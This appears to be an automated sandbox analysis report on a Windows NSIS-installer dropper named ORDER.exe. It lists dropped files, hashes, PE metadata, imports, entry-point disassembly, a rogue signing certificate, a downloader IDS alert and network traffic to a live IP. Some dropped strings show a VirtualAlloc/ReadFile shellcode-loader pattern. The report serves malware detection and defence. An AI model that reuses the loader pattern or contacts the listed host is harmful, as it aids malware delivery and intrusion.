                        SHA1:7864B4676126C1EFEB6EE69A554D23238737F09D
                        SHA-256:1A548CF97C4C367B8EB2AB64799639D5BA8132177EC1A52760E4A44DEB4BD8A3
                        SHA-512:E0BA8ABD6CEBA77803FD589A03475A1739D9873B469E7B83640CD492A9FA3FDB2B319C94EED0A252B85FE72F124EB8322F03A7C5C311CC854CC399C81634B6B3
                        Malicious:false
                        Reputation:low
                        Preview:......................V...S......4..............................y...u........U............`......BBBB................\.v..............g......LLL.............HH.......................:::................F...................44.RR.....................................(((......!......HH........................;...................MM../..................RRR.........**............%............'............................#................O.....}}}.....Q...ZZZZ................ .WW.................[.....................A...GG.................mm.;;........DDD....S.....U..ccc...ZZZZ...............^..W.4...........`......U.....~......q....KKK...]]]]].....>>>.\\\...Y...oo.B.............vvv.....%%%...&.l...........`...B.....p...'...e...h......^....*.......====...].............#....II.x.................O...xxxxxx.........#......}}.zz..f..nn..99.Z..................a.......1..................................................a......i............77..D...........UU.rr....^....................u.....##.......
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):70089
                        Entropy (8bit):1.2513184695627344
                        Encrypted:false
                        SSDEEP:384:lvTTNGT9BZiwMEYhyzAd97w8/LgInf+mLOcPI5fVOv5NxF1FOn4Y0ZNvh5OHgG:lTNWFTMEYYE72InTCuKQ7FOnQv/OAG
                        MD5:D8E80CDEDAE3E054BA1D69902A2CA6D4
                        SHA1:B53C03824D1EDE6681868FF46E00E42D5E7A046F
                        SHA-256:F5C68DAB62BFF1B4F551D1128A5A7ABD4C4B337C1CDA41F3397C22E8E10F019C
                        SHA-512:D1830FA22A6E13BF580D118B14F602520909886DE720B38BA592F427D0553735E981CFA05A2366DAEF86735B6F83C2BD217AF44B12E5826B74C78E25E9F62295
                        Malicious:false
                        Reputation:low
                        Preview:......p.................n...X....................d..........................*............................................................................M............[...........~...............................d....39...................................................................................................................................................................................................................................}.............X........................................................................................q...............................................^.................O....................................................................................Z...........................'................................................................4.........................................................o...[............................................m...............0......................X....0.........................................................
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):34386
                        Entropy (8bit):4.593516032021315
                        Encrypted:false
                        SSDEEP:384:/R0lmqYIbLPEEeT7gXtZ40w83qZ1U++424QHulBg1/5Ji+gKC9LeyoWZzP:8tY6e4Xs0i/Izj5Ji+gKC9a2V
                        MD5:55E2980D6158B9CC092CECE482A70C13
                        SHA1:6368C8BEF4088CE4F56C6C3802B1D335F6DA51E2
                        SHA-256:3311A4FA71C9FF2F3054E279640CF4C5B5A44F9993036456EDDA5649897CB410
                        SHA-512:8202336DD1F2D37FB762E27E1DF8D06E66301424586B2A3DEA5AC9E7E143839F3BA138EED39FAA0EFDF0C2210EA9151FAF27BF94352419449AA5DCD1D9193048
                        Malicious:false
                        Reputation:low
                        Preview:..o....ff.""............bb........4...............00000.............GG........\......////.....L.QQQQ.......p......ll.....oo.......W..............@@.............x......%..........&&......N...xx.....A.J.....55.$.WW...000........Q............z....MM....111.99.......#..........H...................TTTTT........88888888..P..................>.......yy...........b.....;...........##....22..++............222......nn.aa......vv...........kkkk..............................................W......p......................................:.....qq.l.!.................SSS..........CCC...........U..........................ZZZ.WWWW....{{..............ii..H.((((...................1.............dd.....................-.........aaa.[[.D.....{......r..j...........3..........f..........444.....J...............uuuuu........P..a......WW.........rr.................N..]..........QQ................v..........~..............BBBB.hh..:.....HH...[[............66.........d.........!!..................... .77.........
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:FoxPro FPT, blocks size 88, next free block index 170, field type 0
                        Category:dropped
                        Size (bytes):316850
                        Entropy (8bit):1.2494344843876144
                        Encrypted:false
                        SSDEEP:768:UI1y6B1e+17bZEPl0Rnof0brVBSd/oyoTbFlbQ/BZ97yVOTLjv13Y5vx70El7oAN:ra0Xi31pavVKOa4fVlj
                        MD5:5D01D49C1498EC6723D7F194D210DDEB
                        SHA1:283514D6E17F8552A70B4B0DFB419D77FA0AE033
                        SHA-256:6D1337BE2B7C1C17CA7BE7B75518902C618F904923FE3FFBDF4F519DB6BB2BB8
                        SHA-512:286727E8962A8339E4527BFAE8B5879FF2A319C6DA090EB8130FBBB94C0C51AA0931CBCDCFC8D0B63D1DC3F30271AC193FE78C809D3F6A8B0648EB2228FEAF4D
                        Malicious:false
                        Reputation:low
                        Preview:.......X.........................J....q..................o....................................................n..............................{....5.p..V.........GV.........c........$..................................R...e.....E....................3..u...................%.....................+.......T.............z......................................`..............v....................................0................Y............................................................................................................................................................................W.........................D..................c.......................$...............N................f............... ...........R........ ....................y..............g......................P...............................................................................V.......t..............J.se...L.........................................\.........,.w.......................................D..
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):291479
                        Entropy (8bit):1.2623895916251218
                        Encrypted:false
                        SSDEEP:768:I4aF3mt3WBkVYqYZkjVzW72s6Y1rHtslWyNS652rpnfdK4xlkidjdUgxuZHUKiji:+8WZqVPshpX7P/77Lm7X7
                        MD5:2DAE10B8A993D301D5B30447CD554D49
                        SHA1:C0E795B9EBEA6ABAE51A0A56B377BDCE7A52CCF2
                        SHA-256:991EFFB618E7714390252B543789A0B6FE9E2650BD0F5049164DA51717031F51
                        SHA-512:738EE8FC2733644DD773F975075895D5D32AE2F5220A885F07F50873EA2D8FBD2E4DD9400647DF0A11E26B1489CE7391D692874D5E998E1979005D80A2790683
                        Malicious:false
                        Preview:..................Y......................H...............Z..B............................!...................b..D........................................n...........{..........................9...............................................u.......................................*...................................................I.........T...............U.............&.............*.R.....................................................................................y..................F.....Z.....&................................................B.......L.............%...U.......;..........................I..................................._.......D....t........g.....................#.................n..a......................................M......i.....................Z..............................................{..................................................................................#....h.....U.............?.G..............L...........................................
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):527
                        Entropy (8bit):4.275388286900901
                        Encrypted:false
                        SSDEEP:12:sfiS0lw/iN/QGXqpBqt1J5WgR+FofZRVoENhEWJv:sfi3G/iRuLqzGe+FGoENhEqv
                        MD5:E22011A429D7D0729AA1A0B9CADAC17A
                        SHA1:793AE0FACF787AD29AA11A91EBFA079616EC1F10
                        SHA-256:5B857AAE7EEA7961E5571C1E7FA394E6B98C833E74E106C960BBD4D0564AC87B
                        SHA-512:32E762E9309D70F33F6B0537D55629C437D380EF2C5849A1187F4219D53075E0D6C3DF93DF500EA3F3CB5E07E0CBA85165002671362AF5500DD569C3CEB417CE
                        Malicious:false
                        Preview:vilkaarligheden primaternes somewhere reformistiskes pseudoscientifically aggraverende ascidian tidsindstillet udvekslingsformaters porker igjen daddels..recoagulate submucronated cupular miasm mikrofon butterdejssnitter boreholes scrunger lafite childbirth samfundsvidenskaber..coabode archaeolater prisoning,taurean terminalknudes raisons trindadiske kardinaliteter fakkeltogene necessitarianism.altsaxofoner coliseum overdosage forbindelsesofficer reuphold ndlidendes amant,gldesfesternes spejlblankt toastable urol puffwig,
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):30
                        Entropy (8bit):4.256564762130954
                        Encrypted:false
                        SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                        MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                        SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                        SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                        SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                        Malicious:false
                        Preview:user32::EnumWindows(i r1 ,i 0)
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):56
                        Entropy (8bit):4.277864128228976
                        Encrypted:false
                        SSDEEP:3:sAAEVvjssEL84n:fLzq
                        MD5:2DD0441AF10D920D942B7ABD6DB12A0E
                        SHA1:A30239629869D259B9F8EB8C52892FB5BA1E6420
                        SHA-256:5C77D97F033A82507A0DB34CF67C39F2CF329E74701C2FF64EA8C45E1460FFD5
                        SHA-512:C85FB31758D365493D0E88EC6772BE1ED15ACE5198B4A570FDE92D31C820311F7303FCCB8A80D5D1B3E122AC69F9539AC0DE4134ACE0DE178DE38306D03A227E
                        Malicious:false
                        Preview:kernel32::ReadFile(i r5, i r1, i 10485760,*i 0, i 0)i.r3
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.487582004007327
                        Encrypted:false
                        SSDEEP:3:sEMBQEJkJVEj3j9xQoXUn:A9xvUn
                        MD5:F401D6814F595B89476ABE6FE3F36969
                        SHA1:0F1036DA630FFE4D7981E8BE4086A49950192E6E
                        SHA-256:212700C392AD28F9246B5F2C4ACC11B9800911C76F75CED1D6CDC2D83CA2C3FC
                        SHA-512:4C79CE1F02E2192CB961B34910E34EB5C3D8B8159755BBAE10E2C03A33608BE8B6F5CD30377E80807FB2D6C38DA4673CAA9776E6753E95AD524F7C8FE9E3DA73
                        Malicious:false
                        Preview:kernel32::VirtualAlloc(i 0,i 10485760, i 0x3000, i 0x40)p.r1
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):74
                        Entropy (8bit):3.9637832956585757
                        Encrypted:false
                        SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                        MD5:16D513397F3C1F8334E8F3E4FC49828F
                        SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                        SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                        SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                        Malicious:false
                        Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):11264
                        Entropy (8bit):5.779474184733856
                        Encrypted:false
                        SSDEEP:96:zPDYcJ+nx4vVp76JX7zBlkCg21Fxz4THxtrqw1at0JgwLEjo+OB3yUVCdl/wNj+y:zPtkuWJX7zB3kGwfy0nyUVsxCjOM61u
                        MD5:6F5257C0B8C0EF4D440F4F4FCE85FB1B
                        SHA1:B6AC111DFB0D1FC75AD09C56BDE7830232395785
                        SHA-256:B7CCB923387CC346731471B20FC3DF1EAD13EC8C2E3147353C71BB0BD59BC8B1
                        SHA-512:A3CC27F1EFB52FB8ECDA54A7C36ADA39CEFEABB7B16F2112303EA463B0E1A4D745198D413EEBB3551E012C84A20DCDF4359E511E51BC3F1A60B13F1E3BAD1AA8
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        • Antivirus: Virustotal, Detection: 1%, Browse
                        Joe Sandbox View:
                        • Filename: ulACwpUCSU.exe, Detection: malicious, Browse
                        • Filename: fJuwM4Bwi7.exe, Detection: malicious, Browse
                        • Filename: ulACwpUCSU.exe, Detection: malicious, Browse
                        • Filename: fJuwM4Bwi7.exe, Detection: malicious, Browse
                        • Filename: Factura 02297-23042024.exe, Detection: malicious, Browse
                        • Filename: anebilledes.exe, Detection: malicious, Browse
                        • Filename: Factura 02297-23042024.exe, Detection: malicious, Browse
                        • Filename: anebilledes.exe, Detection: malicious, Browse
                        • Filename: Purchase Order1613400027654123.pdf.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....\.U...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text..._........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..b....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1155432
                        Entropy (8bit):4.242047758434036
                        Encrypted:false
                        SSDEEP:6144:5MfR/oEr7eSvNoL2p1W6HbPaQhjyywLs2pIvDwKRQtv6ZHHbcdp7gE2bN0s7ytij:ObeSvNoCpcdOh7YuxT
                        MD5:EA34E794F6026FC2664F8A371ECF01E4
                        SHA1:BDAC91F92F955B9DBC45F9B077382986756F7E76
                        SHA-256:CDCF28ADC6C21C0272D483EB69CECD5D1358CE0C2CD03058AC8C92978D24C7FD
                        SHA-512:6A084FBEE9503D72D0275B62774268A2B35074EB0A9EADD57599B311C15257FB3AE55334FF0FBCB1482E877909CEFD14D1A01122673995CF81013818C057CB59
                        Malicious:false
                        Preview:........,...................x...............................................................................................................................................................................................................................................................J...b..........."...j...............................................................................................................................k...................Y...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):52
                        Entropy (8bit):4.0914493934217315
                        Encrypted:false
                        SSDEEP:3:sBa99k1NoCFOn:KankVg
                        MD5:5D04A35D3950677049C7A0CF17E37125
                        SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                        SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                        SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                        Malicious:false
                        Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                        Category:dropped
                        Size (bytes):756
                        Entropy (8bit):3.5572600264694407
                        Encrypted:false
                        SSDEEP:12:8wl080a/ledp8tzIAGbdpYQI1WQ1EyPWEMMgQ/CNUvH4t2YCBTo8:8wudOaAidU1XPWNMXOUFJT
                        MD5:83602944D0906BA235AB234CB27633CE
                        SHA1:0A7F8E2B6003B686AE51B7671D46BC17BBCD9D18
                        SHA-256:40DFF7E9379AD190EFD9B0D1608E87599C1E12C484E643B8DB3865EC3752A546
                        SHA-512:DCD6D318A02B2493AD4D1D081ECD56D82F1478D508A1807A755399E105FC4E8B43A493D05E5A9CCBFE7D086189D9F23C50D8B22BDA63A76EF30D9B960740FCA7
                        Malicious:false
                        Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".h.2...........rytmiskes.cry.L............................................r.y.t.m.i.s.k.e.s...c.r.y.......*.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.r.y.t.m.i.s.k.e.s...c.r.y.:.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.R.h.a.b.d.o.p.h.o.r.a.\.f.r.y.s.e.r.e.\.t.u.r.n.p.i.k.e.........*................@Z|...K.J.....................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.968875746267401
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 92.16%
                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:ORDER.exe
                        File size:493'216 bytes
                        MD5:08d42759644a2b6c75d6e1cdf188bf40
                        SHA1:c3c6ddce56119679354eddc452ef29151ddf47cd
                        SHA256:342a7c418f2125aee7a228634841450a97c0b0653c5f9217bd1bb0677a5b14db
                        SHA512:32feac648482fbf434525f1f8bfe776e8dfb0643bd8d86e0a00056ad1a6cf4a4e4e5e41813d1e3842d10ad25530f80bc97dba761b8e481897cf59e38833af06f
                        SSDEEP:12288:oirXIqhvMRU8b+R9N/W5WOBSirZKysFIfb3kp01C:oicqt0bWNhOIircysFIfbUK1C
                        TLSH:ADA4236236E605BFDEC209713527AEB4E6B5D309503192CF2B537EBBAE713839447412
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\.U.................^...........2.......p....@
                        Icon Hash:6b69616563c36a25
                        Entrypoint:0x403217
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x55C15CE3 [Wed Aug 5 00:46:27 2015 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:59a4a44a250c4cf4f2d9de2b3fe5d95f
                        Signature Valid:false
                        Signature Issuer:CN="Majestical Hurricano ", O=Emneomraadedefinitionen, L=Princetown, S=England, C=GB
                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                        Error Number:-2146762487
                        Not Before, Not After
                        • 11/06/2024 06:46:36 11/06/2027 06:46:36
                        Subject Chain
                        • CN="Majestical Hurricano ", O=Emneomraadedefinitionen, L=Princetown, S=England, C=GB
                        Version:3
                        Thumbprint MD5:823245696C81DBEB8360A86EC2BD6600
                        Thumbprint SHA-1:918F162D8133F66E92EFC734228B539A11D51115
                        Thumbprint SHA-256:2261985A5B39C77E11B7E67265836ECAB80B6C446BF3A73F25B63C2D84C89041
                        Serial:321044E07399001AC894E678091B1130917A5EAF
                        Instruction
                        sub esp, 00000184h
                        push ebx
                        push ebp
                        push esi
                        xor ebx, ebx
                        push edi
                        mov dword ptr [esp+18h], ebx
                        mov dword ptr [esp+10h], 00409130h
                        mov dword ptr [esp+20h], ebx
                        mov byte ptr [esp+14h], 00000020h
                        call dword ptr [00407034h]
                        push 00008001h
                        call dword ptr [004070B4h]
                        push ebx
                        call dword ptr [0040728Ch]
                        push 00000009h
                        mov dword ptr [004237B8h], eax
                        call 00007F1480400AEAh
                        mov dword ptr [00423704h], eax
                        push ebx
                        lea eax, dword ptr [esp+38h]
                        push 00000160h
                        push eax
                        push ebx
                        push 0041ECB8h
                        call dword ptr [00407164h]
                        push 004091E4h
                        push 00422F00h
                        call 00007F1480400794h
                        call dword ptr [004070B0h]
                        mov ebp, 00429000h
                        push eax
                        push ebp
                        call 00007F1480400782h
                        push ebx
                        call dword ptr [00407118h]
                        cmp byte ptr [00429000h], 00000022h
                        mov dword ptr [00423700h], eax
                        mov eax, ebp
                        jne 00007F14803FDCECh
                        mov byte ptr [esp+14h], 00000022h
                        mov eax, 00429001h
                        push dword ptr [esp+14h]
                        push eax
                        call 00007F1480400212h
                        push eax
                        call dword ptr [00407220h]
                        mov dword ptr [esp+1Ch], eax
                        jmp 00007F14803FDDA5h
                        cmp cl, 00000020h
                        jne 00007F14803FDCE8h
                        inc eax
                        cmp byte ptr [eax], 00000020h
                        je 00007F14803FDCDCh
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x1898.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x773980x1308
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x5c3a0x5e00e5e7adda692e6e028f515fe3daa2b69fFalse0.658951130319149data6.410406825129756IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x70000x11ce0x12005801d712ecba58aa87d1e7d1aa24f3aaFalse0.4522569444444444OpenPGP Secret Key5.236122428806677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x90000x1a7f80x400cc58d0a55ac015d8f1470ea90f440596False0.615234375data5.02661163746607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .ndata0x240000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x370000x18980x1a00af44e2ba305b9ce094acbbb3fd1dcbf7False0.6658653846153846data6.24140956459458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x371d80xe23PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8623929262227135
                        RT_DIALOG0x380000x100dataEnglishUnited States0.5234375
                        RT_DIALOG0x381000x11cdataEnglishUnited States0.6056338028169014
                        RT_DIALOG0x382200x60dataEnglishUnited States0.7291666666666666
                        RT_GROUP_ICON0x382800x14dataEnglishUnited States1.05
                        RT_VERSION0x382980x2c0dataEnglishUnited States0.4772727272727273
                        RT_MANIFEST0x385580x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                        DLLImport
                        KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                        USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                        ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                        ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-09-12T10:16:32.598718+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049736107.150.19.14180TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Sep 12, 2024 10:16:32.149832010 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:32.373116970 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.373378992 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:32.374289989 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:32.598370075 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.598444939 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.598507881 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.598562956 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.598717928 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:32.598872900 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:32.821602106 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.821683884 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.821746111 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.821805000 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.821860075 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.821913958 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.821981907 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.822000027 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:32.822041988 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:32.822114944 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:32.822114944 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:32.822324991 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:32.822324991 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.045320988 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.045403957 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.045465946 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.045523882 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.045545101 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.045587063 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.045650005 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.045708895 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.045717955 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.045772076 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.045830011 CEST8049736107.150.19.141192.168.11.20
                        Sep 12, 2024 10:16:33.045851946 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.045851946 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.045851946 CEST4973680192.168.11.20107.150.19.141
                        Sep 12, 2024 10:16:33.045886993 CEST8049736107.150.19.141192.168.11.20
